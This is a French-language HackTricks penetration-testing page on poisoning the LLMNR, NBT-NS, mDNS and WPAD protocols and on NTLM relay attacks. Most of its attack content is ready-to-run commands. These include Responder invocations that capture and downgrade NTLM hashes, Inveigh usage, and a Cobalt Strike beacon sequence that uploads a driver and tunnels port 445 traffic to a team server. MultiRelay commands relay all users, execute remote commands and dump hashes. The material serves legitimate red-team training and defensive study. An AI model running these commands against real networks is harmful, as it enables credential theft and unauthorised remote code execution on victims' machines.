Spoofing LLMNR, NBT-NS, mDNS/DNS et WPAD et attaques de relais
Reading time: 7 minutes
tip
Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)
Soutenir HackTricks
- VĂ©rifiez les plans d'abonnement !
- Rejoignez le đŹ groupe Discord ou le groupe telegram ou suivez nous sur Twitter đŠ @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PRs au HackTricks et HackTricks Cloud dépÎts github.
Protocoles RĂ©seau
Protocoles de RĂ©solution de Nom Local
- LLMNR, NBT-NS et mDNS :
- Microsoft et d'autres systĂšmes d'exploitation utilisent LLMNR et NBT-NS pour la rĂ©solution de noms locaux lorsque DNS Ă©choue. De mĂȘme, les systĂšmes Apple et Linux utilisent mDNS.
- Ces protocoles sont susceptibles d'interception et de spoofing en raison de leur nature non authentifiée et de diffusion sur UDP.
- Responder peut ĂȘtre utilisĂ© pour usurper des services en envoyant des rĂ©ponses falsifiĂ©es aux hĂŽtes interrogeant ces protocoles.
- Des informations supplĂ©mentaires sur l'usurpation de services utilisant Responder peuvent ĂȘtre trouvĂ©es ici.
Protocole de DĂ©couverte Automatique de Proxy Web (WPAD)
- WPAD permet aux navigateurs de découvrir automatiquement les paramÚtres de proxy.
- La découverte est facilitée via DHCP, DNS, ou un retour à LLMNR et NBT-NS si DNS échoue.
- Responder peut automatiser les attaques WPAD, dirigeant les clients vers des serveurs WPAD malveillants.
Responder pour le Poisoning de Protocole
- Responder est un outil utilisĂ© pour empoisonner les requĂȘtes LLMNR, NBT-NS et mDNS, rĂ©pondant sĂ©lectivement en fonction des types de requĂȘtes, ciblant principalement les services SMB.
- Il est prĂ©installĂ© dans Kali Linux, configurable Ă
/etc/responder/Responder.conf
. - Responder affiche les hachages capturés à l'écran et les enregistre dans le répertoire
/usr/share/responder/logs
. - Il prend en charge Ă la fois IPv4 et IPv6.
- La version Windows de Responder est disponible ici.
Exécution de Responder
- Pour exécuter Responder avec les paramÚtres par défaut :
responder -I <Interface>
- Pour un sondage plus agressif (avec des effets secondaires potentiels) :
responder -I <Interface> -P -r -v
- Techniques pour capturer les défis/réponses NTLMv1 pour un craquage plus facile :
responder -I <Interface> --lm --disable-ess
- L'usurpation WPAD peut ĂȘtre activĂ©e avec :
responder -I <Interface> --wpad
- Les requĂȘtes NetBIOS peuvent ĂȘtre rĂ©solues Ă l'IP de l'attaquant, et un proxy d'authentification peut ĂȘtre mis en place :
responder.py -I <interface> -Pv
Poisoning DHCP avec Responder
- Le spoofing des réponses DHCP peut empoisonner de maniÚre permanente les informations de routage d'une victime, offrant une alternative plus discrÚte au poisoning ARP.
- Cela nécessite une connaissance précise de la configuration du réseau cible.
- Exécution de l'attaque :
./Responder.py -I eth0 -Pdv
- Cette méthode peut capturer efficacement les hachages NTLMv1/2, mais nécessite une manipulation prudente pour éviter toute perturbation du réseau.
Capture de Credentials avec Responder
- Responder usurpera des services en utilisant les protocoles mentionnés ci-dessus, capturant des credentials (généralement NTLMv2 Challenge/Réponse) lorsqu'un utilisateur tente de s'authentifier contre les services usurpés.
- Des tentatives peuvent ĂȘtre faites pour rĂ©trograder Ă NetNTLMv1 ou dĂ©sactiver ESS pour un craquage de credentials plus facile.
Il est crucial de noter que l'utilisation de ces techniques doit ĂȘtre effectuĂ©e lĂ©galement et Ă©thiquement, en s'assurant d'une autorisation appropriĂ©e et en Ă©vitant toute perturbation ou accĂšs non autorisĂ©.
Inveigh
Inveigh est un outil pour les testeurs de pĂ©nĂ©tration et les Ă©quipes rouges, conçu pour les systĂšmes Windows. Il offre des fonctionnalitĂ©s similaires Ă Responder, effectuant des attaques de spoofing et de l'homme du milieu. L'outil a Ă©voluĂ© d'un script PowerShell Ă un binaire C#, avec Inveigh et InveighZero comme principales versions. Des paramĂštres dĂ©taillĂ©s et des instructions peuvent ĂȘtre trouvĂ©s dans le wiki.
Inveigh peut ĂȘtre utilisĂ© via PowerShell :
Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
Ou exécuté en tant que binaire C#:
Inveigh.exe
NTLM Relay Attack
Cette attaque exploite les sessions d'authentification SMB pour accéder à une machine cible, accordant un shell systÚme si elle réussit. Les prérequis clés incluent :
- L'utilisateur authentifié doit avoir un accÚs administrateur local sur l'hÎte relayé.
- La signature SMB doit ĂȘtre dĂ©sactivĂ©e.
445 Port Forwarding and Tunneling
Dans les scĂ©narios oĂč l'introduction directe dans le rĂ©seau n'est pas rĂ©alisable, le trafic sur le port 445 doit ĂȘtre redirigĂ© et tunnelĂ©. Des outils comme PortBender aident Ă rediriger le trafic du port 445 vers un autre port, ce qui est essentiel lorsque l'accĂšs administrateur local est disponible pour le chargement de pilotes.
PortBender setup and operation in Cobalt Strike:
Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)
beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080
# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop
Autres outils pour l'attaque de relais NTLM
- Metasploit : Configuré avec des proxies, des détails sur les hÎtes locaux et distants.
- smbrelayx : Un script Python pour relayer les sessions SMB et exécuter des commandes ou déployer des portes dérobées.
- MultiRelay : Un outil de la suite Responder pour relayer des utilisateurs spécifiques ou tous les utilisateurs, exécuter des commandes ou extraire des hachages.
Chaque outil peut ĂȘtre configurĂ© pour fonctionner via un proxy SOCKS si nĂ©cessaire, permettant des attaques mĂȘme avec un accĂšs rĂ©seau indirect.
Fonctionnement de MultiRelay
MultiRelay est exécuté depuis le /usr/share/responder/tools répertoire, ciblant des IP ou des utilisateurs spécifiques.
python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes
# Proxychains for routing traffic
Ces outils et techniques forment un ensemble complet pour mener des attaques par relais NTLM dans divers environnements réseau.
Forcer les connexions NTLM
Dans Windows, vous pouvez ĂȘtre en mesure de forcer certains comptes privilĂ©giĂ©s Ă s'authentifier sur des machines arbitraires. Lisez la page suivante pour apprendre comment :
Force NTLM Privileged Authentication
Références
- https://intrinium.com/smb-relay-attack-tutorial/
- https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/
- https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
- https://intrinium.com/smb-relay-attack-tutorial/
- https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
tip
Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)
Soutenir HackTricks
- VĂ©rifiez les plans d'abonnement !
- Rejoignez le đŹ groupe Discord ou le groupe telegram ou suivez nous sur Twitter đŠ @hacktricks_live.
- Partagez des astuces de hacking en soumettant des PRs au HackTricks et HackTricks Cloud dépÎts github.